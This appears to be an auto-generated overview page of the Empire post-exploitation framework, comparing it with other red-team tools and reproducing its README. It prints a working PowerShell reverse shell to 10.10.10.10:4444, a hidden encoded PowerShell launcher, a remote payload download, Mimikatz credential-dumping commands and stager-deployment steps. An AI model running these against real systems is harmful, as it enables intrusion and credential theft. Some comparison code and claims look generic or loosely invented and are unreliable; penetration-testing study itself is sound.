Top Related Projects
Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.
PowerSploit - A PowerShell Post-Exploitation Framework
Metasploit Framework
Covenant is a collaborative .NET C2 framework for red teamers.
A proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.
Nishang - Offensive PowerShell for red team, penetration testing and offensive security.
Quick Overview
Empire is a post-exploitation framework that allows for the creation and management of agents on compromised systems. It provides a powerful set of tools for red team operations, penetration testing, and adversary simulation. Empire combines the capabilities of PowerShell Empire and Python, offering a cross-platform solution for both Windows and *nix environments.
Pros
- Cross-platform support for Windows and *nix systems
- Extensive set of modules for various post-exploitation tasks
- Active development and community support
- Highly customizable and extensible
Cons
- Potentially detectable by modern antivirus and EDR solutions
- Steep learning curve for beginners
- Requires careful handling to avoid unintended consequences
- May be misused for malicious purposes
Code Examples
# Creating a listener
listeners = empire.get_listeners()
http_listener = listeners.create('http', {
'Name': 'MyHTTPListener',
'Host': '192.168.1.100',
'Port': 8080
})
# Generating a stager
stagers = empire.get_stagers()
windows_stager = stagers.generate('windows/launcher_bat', {
'Listener': 'MyHTTPListener',
'OutFile': 'evil.bat'
})
# Executing a module on an agent
modules = empire.get_modules()
result = modules.execute('powershell/situational_awareness/network/powerview/get_domain_controller', {
'Agent': 'ABC123'
})
print(result)
Getting Started
-
Clone the repository:
git clone https://github.com/EmpireProject/Empire.git
-
Install dependencies:
cd Empire sudo ./setup/install.sh
-
Start Empire:
sudo ./empire
-
Create a listener and generate a stager:
listeners uselistener http set Name MyListener execute usestager windows/launcher_bat set Listener MyListener generate
-
Deploy the stager on a target system and wait for the agent to check in.
Competitor Comparisons
Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.
Pros of Empire (BC-SECURITY)
- More actively maintained with frequent updates
- Enhanced features and modules
- Improved compatibility with modern systems
Cons of Empire (BC-SECURITY)
- Potential learning curve for users familiar with the original
- Some legacy modules may not be fully supported
- Larger codebase may require more resources
Code Comparison
Empire (EmpireProject):
class Listener:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'HTTP[S]',
'Author': ['@harmj0y'],
'Description': ('Starts a http[s] listener.'),
'Category' : ('listener'),
'Comments': []
}
Empire (BC-SECURITY):
class Listener(ListenerBase):
def __init__(self, mainMenu, params=[]):
super().__init__(mainMenu, params)
self.info = {
'Name': 'HTTP[S]',
'Author': ['@harmj0y', '@_staaldraad'],
'Description': ('Starts a http[s] listener.'),
'Category': ('listener'),
'Comments': []
}
The BC-SECURITY version shows inheritance from a base class and additional authorship, indicating more extensive development and potential feature enhancements.
PowerSploit - A PowerShell Post-Exploitation Framework
Pros of PowerSploit
- More focused on PowerShell-specific exploitation and post-exploitation techniques
- Larger collection of individual modules for specific tasks
- Generally easier to integrate into existing PowerShell scripts or workflows
Cons of PowerSploit
- Less actively maintained compared to Empire
- Lacks the comprehensive command and control (C2) framework that Empire provides
- May require more manual effort to chain together multiple modules for complex operations
Code Comparison
PowerSploit example (Invoke-Mimikatz):
Invoke-Mimikatz -DumpCreds
Empire example (using mimikatz):
usemodule credentials/mimikatz/logonpasswords
execute
Both projects offer powerful post-exploitation capabilities, but Empire provides a more comprehensive framework for red team operations, while PowerSploit focuses on individual PowerShell-based tools and modules. Empire integrates various techniques into a unified platform, whereas PowerSploit offers more flexibility for incorporating specific modules into custom scripts or existing workflows.
Metasploit Framework
Pros of Metasploit-Framework
- Larger community and more extensive module library
- Better documentation and support resources
- More frequent updates and active development
Cons of Metasploit-Framework
- Steeper learning curve for beginners
- More resource-intensive and slower startup times
- Less focused on post-exploitation capabilities
Code Comparison
Empire:
# Example of a PowerShell-based Empire module
function Invoke-Example {
param($Param1, $Param2)
# Empire-specific code here
}
Metasploit-Framework:
# Example of a Ruby-based Metasploit module
class MetasploitModule < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'Example Module',
'Description' => 'This is an example module'
))
end
# Metasploit-specific code here
end
Empire focuses on PowerShell-based post-exploitation, while Metasploit-Framework offers a broader range of exploit and post-exploitation modules written primarily in Ruby. Empire's modules are generally more concise and tailored for Windows environments, whereas Metasploit-Framework's modules are more versatile and support a wider range of target systems.
Covenant is a collaborative .NET C2 framework for red teamers.
Pros of Covenant
- Built with .NET Core, offering cross-platform compatibility
- Features a modern, user-friendly web interface for easier management
- Supports customizable C2 profiles for improved flexibility
Cons of Covenant
- Smaller community and less extensive documentation compared to Empire
- Fewer built-in modules and payloads out of the box
- Steeper learning curve for users not familiar with .NET development
Code Comparison
Covenant (C#):
public class GruntTasking
{
public int Id { get; set; }
public string Name { get; set; }
public TaskingType Type { get; set; }
public string Command { get; set; }
}
Empire (Python):
class Task(object):
def __init__(self, taskID, command, results='', status='', args=None):
self.taskID = taskID
self.command = command
self.results = results
self.status = status
self.args = args
Both projects implement task-based structures, but Covenant uses C# properties while Empire uses Python's object-oriented approach. Covenant's implementation is more concise due to C#'s built-in property syntax.
A proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.
Pros of PoshC2
- Written in Python, making it more accessible for customization and contributions
- Supports a wider range of payload types, including .NET assemblies and shellcode
- Offers a web interface for easier management and collaboration
Cons of PoshC2
- Less extensive documentation compared to Empire
- Smaller community and fewer available modules
- May have a steeper learning curve for users new to Python-based C2 frameworks
Code Comparison
Empire (PowerShell):
$wc = New-Object System.Net.WebClient
$wc.Headers.Add("User-Agent", "Mozilla/5.0")
$data = $wc.DownloadData("http://example.com/payload")
PoshC2 (Python):
import requests
headers = {"User-Agent": "Mozilla/5.0"}
response = requests.get("http://example.com/payload", headers=headers)
data = response.content
Both frameworks use similar techniques for payload retrieval, but PoshC2's Python implementation offers more flexibility and easier integration with other Python libraries.
Nishang - Offensive PowerShell for red team, penetration testing and offensive security.
Pros of Nishang
- Written in PowerShell, making it more lightweight and easier to use on Windows systems
- Includes a wider variety of scripts for different post-exploitation tasks
- More frequently updated, with recent commits and active development
Cons of Nishang
- Less comprehensive framework compared to Empire's modular architecture
- Lacks the extensive documentation and community support that Empire has
- Does not offer the same level of multi-platform support as Empire
Code Comparison
Nishang (PowerShell):
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",4444)
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
{
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)
$sendback = (iex $data 2>&1 | Out-String )
$sendback2 = $sendback + "PS " + (pwd).Path + "> "
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
$stream.Write($sendbyte,0,$sendbyte.Length)
$stream.Flush()
}
$client.Close()
Empire (Python):
import sys
import base64
import subprocess
def run_ps_code(code):
encodedCode = base64.b64encode(code.encode('utf-16le')).decode()
cmd = f'powershell -NoP -NonI -W Hidden -Exec Bypass -Enc {encodedCode}'
output = subprocess.check_output(cmd, shell=True)
return output.decode()
if __name__ == '__main__':
ps_code = sys.argv[1]
result = run_ps_code(ps_code)
print(result)
Convert designs to code with AI
Introducing Visual Copilot: A new AI model to turn Figma designs to high quality code using your components.
Try Visual CopilotREADME
Empire
This project is no longer supported
Empire is a post-exploitation framework that includes a pure-PowerShell2.0 Windows agent, and a pure Python 2.6/2.7 Linux/OS X agent. It is the merge of the previous PowerShell Empire and Python EmPyre projects. The framework offers cryptologically-secure communications and a flexible architecture. On the PowerShell side, Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework. PowerShell Empire premiered at BSidesLV in 2015 and Python EmPyre premeiered at HackMiami 2016.
Empire relies heavily on the work from several other projects for its underlying functionality. We have tried to call out a few of those people we've interacted with heavily here and have included author/reference link information in the source of each Empire module as appropriate. If we have failed to improperly cite existing or prior work, please let us know.
Empire is developed by @harmj0y, @sixdub, @enigma0x3, rvrsh3ll, @killswitch_gui, and @xorrior.
Feel free to join us on Slack! https://bloodhoundgang.herokuapp.com
Install
To install, run sudo ./setup/install.sh
script or use the corresponding docker image docker pull empireproject/empire
.
There's also a quickstart here and full documentation here.
Quickstart
Check out the Empire wiki for instructions on getting started with Empire.
Contribution Rules
Contributions are more than welcome! The more people who contribute to the project the better Empire will be for everyone. Below are a few guidelines for submitting contributions.
- Beginning with version 2.4, we will only troubleshoot issues for Kali, Debian, or Ubuntu. All other operating systems will not be supported. We understand that this is frustrating but hopefully the new docker build can provide an alternative.
- Submit pull requests to the dev branch. After testing, changes will be merged to master.
- Depending on what you're working on, base your module on ./lib/modules/powershell_template.py or ./lib/modules/python_template.py. Note that for some modules you may need to massage the output to get it into a nicely displayable text format with Out-String.
- Cite previous work in the 'Comments' module section.
- If your script.ps1 logic is large, may be reused by multiple modules, or is updated often, consider implementing the logic in the appropriate data/module_source/* directory and pulling the script contents into the module on tasking.
- Use approved PowerShell verbs for any functions.
- PowerShell Version 2 compatibility is STRONGLY preferred.
- TEST YOUR MODULE! Be sure to run it from an Empire agent before submitting a pull to ensure everything is working correctly.
- For additional guidelines for your PowerShell code itself, check out the PowerSploit style guide.
Top Related Projects
Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.
PowerSploit - A PowerShell Post-Exploitation Framework
Metasploit Framework
Covenant is a collaborative .NET C2 framework for red teamers.
A proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.
Nishang - Offensive PowerShell for red team, penetration testing and offensive security.
Convert designs to code with AI
Introducing Visual Copilot: A new AI model to turn Figma designs to high quality code using your components.
Try Visual Copilot